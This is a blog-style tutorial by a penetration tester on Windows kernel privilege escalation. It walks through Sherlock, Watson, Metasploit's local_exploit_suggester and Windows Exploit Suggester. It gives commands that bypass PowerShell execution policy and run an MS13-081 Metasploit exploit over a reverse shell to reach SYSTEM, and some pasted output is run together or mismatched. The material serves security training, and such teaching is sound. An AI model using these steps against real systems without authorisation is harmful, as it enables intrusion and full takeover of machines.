Windows Kernel Exploitation

There are several tools out there to check if there are known exploits against unpatched Windows Kernels. The most notable are listed below:

Each of these has their pros and cons. I will discuss them one by one and what they may be useful for:


Sherlock is a tool that was created by a user that goes by rasta-mouse. The project can be found here. The program only checks against some older known exploits, so this script may be useful against older Windows machines, or some CTF boxes. Currently the script checks for these exploits:

  • MS10–015 : User Mode to Ring (KiTrap0D)

To run the script, we can run the commands below:

c:\> powershell -ep bypass
c:\> Import-Module .\Sherlock.ps1
c:\> Find-AllVulns
...snip...Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link :
VulnStatus : Appears Vulnerable

The script will check against all the known vulnerabilities. If you would like to manually exploit something that looks vulnerable, you can navigate here to get a list of pre-compiled exploits for these kernel versions. A lot of the time, the exploits will link you to an exploit on Exploit-DB that you can download and compile yourself.


Watson is the upgraded and updated version of Sherlock. Sherlock is depreciated, but Watson is updated monthly by rasta-mouse with new exploit checks. The pros to using Watson are you are going to get more accurate results and the project is updated frequently. Are there any cons? Kind of. Watson is harder to set-up before you use it. The reason is you have to precompile Watson specifically for the version of .NET being used on the target Windows machine because it uses C# instead of PowerShell. I will explain how to do this:

First you will need to get the version of .NET being used on the target machine. You can find the installed version in C:\windows\\framework\

PS > C:\windows\\framework\07/16/2016  09:23 AM    <DIR>          v1.0.3705
07/16/2016 09:23 AM <DIR> v1.1.4322
06/04/2018 02:07 PM <DIR> v2.0.50727
06/04/2018 02:07 PM <DIR> v3.0
06/04/2018 02:07 PM <DIR> v3.5
04/13/2019 10:44 AM <DIR> v4.0.30319

In this example, the target machine is using .NET version 4.0.

Next you will need to download the project from the Watson Github Page. The next steps need to be done on a Windows machine or a Windows VM using Visual Studio.

In Visual Studio, you will have the option to open a project folder. Select the Entire folder. Next On the right hand side you will see a file called watson.sln. Double click that to open up the project. Now you will Right click the Project Watson (step 1 in image) and select properties (step 2 in image). Under “application” (step 3), you can set the target framework to the version you would like which should be version 4.0 in our case.

We can now build the program which should be called Watson.exe. The .exe file will be found in the bin folder. This can now be copied over to the target machine and executed:

C:\> .\Watson.exe...snip...[*] Appears vulnerable to MS13-005
[>] Description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation.
[>] Exploit:
[>] Notes: None.

Watson will also provide suggested exploits and the links to them. You can navigate to these exploits and compile them for the machine. You can also find a list of pre-compiled exploits here.


With Metsaploit, you should already have a Meterpreter shell already opened for this to work. The tools we are going to use are post-exploit modules which means they are modules that are used after getting your initial foothold on the machine.

The module we will be using is post/multi/recon/local_exploit_suggester

To run this module, we can run the command below assuming we already have a Meterpreter shell:

Meterpreter> run post/multi/recon/local_exploit_suggester SHOWDESCRIPTION=true[*] Collecting local exploits for x86/windows...
[*] 28 exploit checks are being tried...
...snip...[*] exploit/windows/local/ms13_081_track_popup_menu: The target is vulnerable...snip...

After we have a list of possible exploits, we can search on Exploit-DB for an exploit and compile it, we can check out this list of pre-compiled exploits for Windows, or we can use the suggested Metasploit module. In the above example it gives us the exploit/windows/local_ms13_081_track_popup_menu module. To exploit this vulnerability, we can run these commands:

Metasploit> use exploit/windows/local/ms13_081_track_popup_menumsf exploit(windows/local/ms13_081_track_popup_menu) > optionsModule options (exploit/windows/local/ms10_092_schelevator):Name      Current Setting  Required  Description----      ---------------  --------  -----------CMD                        no        Command to execute instead of a payload
SESSION 1 yes The session to run this module on.
TASKNAME no A name for the created task (default random)
msf exploit(windows/local/ms13_081_track_popup_menu) > run[*] Started reverse TCP handler on > getuiServer username: NT AUTHORITY\SYSTEM

Windows Exploit Suggester — Next Generation

Windows Exploit Suggester — Next Generation uses the output of systeminfo to determine a list of vulnerabilities the OS is vulnerable to. The project is updated frequently by the developer. The pros are it is easy to use, and it is updated frequently, the con to this tool is that you must have Python installed on the target Windows machine. Windows does not have Python installed by default so this could be a problem. First you will need to download a copy of the tool from here. The next steps are outlined pretty well on the documentation page so I will copy them word for word here:

  1. Obtain the latest database of vulnerabilities by executing the command --update.

After the program has run, it will display a list of exploits and the link to the exploit. You can navigate to the page to download and compile the exploit yourself, or you can search here for a list of pre-compiled exploits that you can use.

I hope this post was useful. We went over several ways on how to search for Windows kernel vulnerabilities and how to exploit them. While one tool may work amazing for one situation, it may not work as well for a different situation. It never hurts to know how to do something more than one way.



I am a Security Consultant and formerly worked at PayPal as a Penetration Tester. At night I teach Cyber Security at UTexas. OSCP

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Recipe For Root

I am a Security Consultant and formerly worked at PayPal as a Penetration Tester. At night I teach Cyber Security at UTexas. OSCP